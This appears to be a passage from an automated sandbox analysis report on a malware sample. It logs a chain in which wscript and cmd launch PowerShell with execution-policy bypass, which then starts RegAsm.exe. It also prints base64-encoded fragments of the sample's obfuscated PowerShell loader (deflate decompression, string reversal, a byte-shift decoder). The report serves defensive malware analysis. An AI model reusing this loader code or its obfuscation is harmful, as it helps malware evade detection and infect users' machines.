ZSBhIG1pc3Rha2UuIg0KDQoNCmZ1bmN0aW9uIFJldmVyc2VTdHJpbmcoJGlucHV0U3RyaW5nKSB7DQogICAgJGNoYXJBcnJheSA9ICRpbnB1dFN0cmluZy5Ub0NoYXJBcnJheSgpDQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0NCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheQ0KICAgIHJldHVybiAkcmV2ZXJzZWRTdHJpbmcNCn0NCiMgIlRoZXJlIGlzIGFsd2F5cyBzb21lIG1hZG5lc3MgaW4gbG92ZS4gQnV0IHRoZXJlIGlzIGFsc28gYWx3YXlzIHNvbWUgcmVhc29uIGluIG1hZG5lc3MuIg0KIyAiVGhhdCB3aGljaCBkb2VzIG5vdCBraWxsIHVzIG1ha2VzIHVzIHN0cm9uZ2VyLiINCg0KZnVuY3Rpb24gQ2xvc2UtUHJvY2VzcyB7DQogICAgcGFyYW0oDQogICAgICAgIFtzdHJpbmddJFByb2Nlc3NOYW1lDQogICAgKQ0KDQogICAgJHByb2Nlc3MgPSBHZXQtUHJvY2VzcyAtTmFtZSAkUHJvY2Vzc05hbWUgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWUNCg0KICAgIGlmICgkcHJvY2VzcyAtbmUgJG51bGwpIHsNCiAgICAgICAgU3RvcC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRm9yY2UNCgl9DQp9DQojICJJbiBpbmRpdmlkdWFscywgaW5zYW5pdHkgaXMgcmFyZTsgYnV0IGluIGdyb3VwcywgcGFydGllcywgbmF0aW9ucywgYW5kIGVwb2NocywgaXQgaXMgdGhlIHJ1bGUuIg0KIyAiVGhlIG1hbiBvZiBrbm93bGVkZ2UgbXVzdCBiZSBhYmxlIG5vdCBvbmx5IHRvIGxvdmUgaGlzIGVuZW1pZXMgYnV0IGFsc28gdG8gaGF0ZSBoaXMgZnJpZW5kcy4iDQojICJBIHRoaW5rZXIgc2VlcyBoaXMgb3duIGFjdGlvbnMgYXMgZXhwZXJpbWVudHMgYW5kIHF1ZXN0aW9ucyDigJQgYXMgYXR0ZW1wdHMgdG8gZmluZCBvdXQgc29tZXRoaW5nLiBTdWNjZXNzIGFuZCBmYWlsdXJlIGFyZSBmb3IgaGltIGFuc3dlcnMgYWJvdmUgYWxsLiINCg0KZnVuY3Rpb24gQ05WKCRhcnIpeyANCiAgICAkbz0xMjM7IA0KICAgICRkPSRudWxsOyANCiAgICBmb3JlYWNoKCRpIGluICRhcnIpeyANCiAgICAgICAgaWYgKCRpIC1ndCAxMjcpIHsgDQogICAgICAgICAgICAkZCs9IFtjaGFyXSgkaS0kbykgDQogICAgICAgIH0gZWxzZSB7IA0KICAgICAgICAgICAgJGQrPSBbY2hhcl0oJGkrJG8pIA0KICAgICAgICB9IA0KICAgIH0gDQogICAgcmV0dXJuICRkIA0KfQ0KDQoNCiRlbmNvZGVkQXJyYXkgPSBAKDE1OSwyMjAsMjM4Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\QJHJap.ps1"Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                          Source: C:\Users\user\Desktop\f6FauZ2CEz.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\f6FauZ2CEz.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\f6FauZ2CEz.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\f6FauZ2CEz.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\f6FauZ2CEz.exeSection loaded: dwmapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\f6FauZ2CEz.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\f6FauZ2CEz.exeSection loaded: oleacc.dllJump to behavior
                          Source: C:\Users\user\Desktop\f6FauZ2CEz.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\Desktop\f6FauZ2CEz.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\f6FauZ2CEz.exeSection loaded: shfolder.dllJump to behavior
                          Source: C:\Users\user\Desktop\f6FauZ2CEz.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\f6FauZ2CEz.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\f6FauZ2CEz.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\f6FauZ2CEz.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwrite.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: appxsip.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: opcservices.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: esdsip.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sxs.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: scrrun.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: linkinfo.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\f6FauZ2CEz.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                          Source: Google Chrome.lnk.6.drLNK file: ..\..\..\Program Files\Google\Chrome\Application\chrome.exe
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                          Source: f6FauZ2CEz.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                          Data Obfuscation

                          barindex
                          Found suspicious powershell code related to unpacking or dynamic code loading
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2
                          Suspicious powershell command line found
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KIyAiVGhlIHN1cmVzdCB3YXkgdG8gY29ycnVwdCBhIHlvdXRoIGlzIHRvIGluc3RydWN0IGhpbSB0byBob2xkIGluIGhpZ2hlciBlc3RlZW0gdGhvc2Ugd2hvIHRoaW5rIGFsaWtlIHRoYW4gdGhvc2Ugd2hvIHRoaW5rIGRpZmZlcmVudGx5LiINCiMgIkluIGhlYXZlbiwgYWxsIHRoZSBpbnRlcmVzdGluZyBwZW9wbGUgYXJlIG1pc3NpbmcuIg0KIyAiSGUgd2hvIGhhcyBhIHdoeSB0byBsaXZlIGNhbiBiZWFyIGFsbW9zdCBhbnkgaG93LiINCiMgIlRvIGxpdmUgaXMgdG8gc3VmZmVyLCB0byBzdXJ2aXZlIGlzIHRvIGZpbmQgc29tZSBtZWFuaW5nIGluIHRoZSBzdWZmZXJpbmcuIg0KIyAiV2l0aG91dCBtdXNpYywgbGlmZSB3b3VsZCBiZSBhIG1pc3Rha2UuIg0KDQoNCmZ1bmN0aW9uIFJldmVyc2VTdHJpbmcoJGlucHV0U3RyaW5nKSB7DQogICAgJGNoYXJBcnJheSA9ICRpbnB1dFN0cmluZy5Ub0NoYXJBcnJheSgpDQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0NCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheQ0KICAgIHJldHVybiAkcmV2ZXJzZWRTdHJpbmcNCn0NCiMgIlRoZXJlIGlzIGFsd2F5cyBzb21lIG1hZG5lc3MgaW4gbG92ZS4gQnV0IHRoZXJlIGlzIGFsc28gYWx3YXlzIHNvbWUgcmVhc29uIGluIG1hZG5lc3MuIg0KIyAiVGhhdCB3aGljaCBkb2VzIG5vdCBraWxsIHVzIG1ha2VzIHVzIHN0cm9uZ2VyLiINCg0KZnVuY3Rpb24gQ2xvc2UtUHJvY2VzcyB7DQogICAgcGFyYW0oDQogICAgICAgIFtzdHJpbmddJFByb2Nlc3NOYW1lDQogICAgKQ0KDQogICAgJHByb2Nlc3MgPSBHZXQtUHJvY2VzcyAtTmFtZSAkUHJvY2Vzc05hbWUgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWUNCg0KICAgIGlmICgkcHJvY2VzcyAtbmUgJG51bGwpIHsNCiAgICAgICAgU3RvcC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRm9yY2UNCgl9DQp9DQojICJJbiBpbmRpdmlkdWFscywgaW5zYW5pdHkgaXMgcmFyZTsgYnV0IGluIGdyb3VwcywgcGFydGllcywgbmF0aW9ucywgYW5kIGVwb2NocywgaXQgaXMgdGhlIHJ1bGUuIg0KIyAiVGhlIG1hbiBvZiBrbm93bGVkZ2UgbXVzdCBiZSBhYmxlIG5vdCBvbmx5IHRvIGxvdmUgaGlzIGVuZW1pZXMgYnV0IGFsc28gdG8gaGF0ZSBoaXMgZnJpZW5kcy4iDQojICJBIHRoaW5rZXIgc2VlcyBoaXMgb3duIGFjdGlvbnMgYXMgZXhwZXJpbWVudHMgYW5kIHF1ZXN0aW9ucyDigJQgYXMgYXR0ZW1wdHMgdG8gZmluZCBvdXQgc29tZXRoaW5nLiBTdWNjZXNzIGFuZCBmYWlsdXJlIGFyZSBmb3IgaGltIGFuc3dlcnMgYWJvdmUgYWxsLiINCg0KZnVuY3Rpb24gQ05WKCRhcnIpeyANCiAgICAkbz0xMjM7IA0KICAgICRkPSRudWxsOyANCiAgICBmb3JlYWNoKCRpIGluICRhcnIpeyANCiAgICAgICAgaWYgKCRpIC1ndCAxMjcpIHsgDQogICAgICAgICAgICAkZCs9IFtjaGFyXSgkaS0kbykgDQogICAgICAgIH0gZWxzZSB7IA0KICAgICAgICAgICAgJGQrPSBbY2hhcl0oJGkrJG8pIA0KICAgICAgICB9IA0KICAgIH0gDQogICAgcmV0dXJuICRkIA0KfQ0KDQoNCiRlbmNvZGVkQXJyYXkgPSBAKDE1OSwyMjAsMjM4
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KIyAiVGhlIHN1cmVzdCB3YXkgdG8gY29ycnVwdCBhIHlvdXRoIGlzIHRvIGluc3RydWN0IGhpbSB0byBob2xkIGluIGhpZ2hlciBlc3RlZW0gdGhvc2Ugd2hvIHRoaW5rIGFsaWtlIHRoYW4gdGhvc2Ugd2hvIHRoaW5rIGRpZmZlcmVudGx5LiINCiMgIkluIGhlYXZlbiwgYWxsIHRoZSBpbnRlcmVzdGluZyBwZW9wbGUgYXJlIG1pc3NpbmcuIg0KIyAiSGUgd2hvIGhhcyBhIHdoeSB0byBsaXZlIGNhbiBiZWFyIGFsbW9zdCBhbnkgaG93LiINCiMgIlRvIGxpdmUgaXMgdG8gc3VmZmVyLCB0byBzdXJ2aXZlIGlzIHRvIGZpbmQgc29tZSBtZWFuaW5nIGluIHRoZSBzdWZmZXJpbmcuIg0KIyAiV2l0aG91dCBtdXNpYywgbGlmZSB3b3VsZCBiZSBhIG1pc3Rha2UuIg0KDQoNCmZ1bmN0aW9uIFJldmVyc2VTdHJpbmcoJGlucHV0U3RyaW5nKSB7DQogICAgJGNoYXJBcnJheSA9ICRpbnB1dFN0cmluZy5Ub0NoYXJBcnJheSgpDQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0NCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheQ0KICAgIHJldHVybiAkcmV2ZXJzZWRTdHJpbmcNCn0NCiMgIlRoZXJlIGlzIGFsd2F5cyBzb21lIG1hZG5lc3MgaW4gbG92ZS4gQnV0IHRoZXJlIGlzIGFsc28gYWx3YXlzIHNvbWUgcmVhc29uIGluIG1hZG5lc3MuIg0KIyAiVGhhdCB3aGljaCBkb2VzIG5vdCBraWxsIHVzIG1ha2VzIHVzIHN0cm9uZ2VyLiINCg0KZnVuY3Rpb24gQ2xvc2UtUHJvY2VzcyB7DQogICAgcGFyYW0oDQogICAgICAgIFtzdHJpbmddJFByb2Nlc3NOYW1lDQo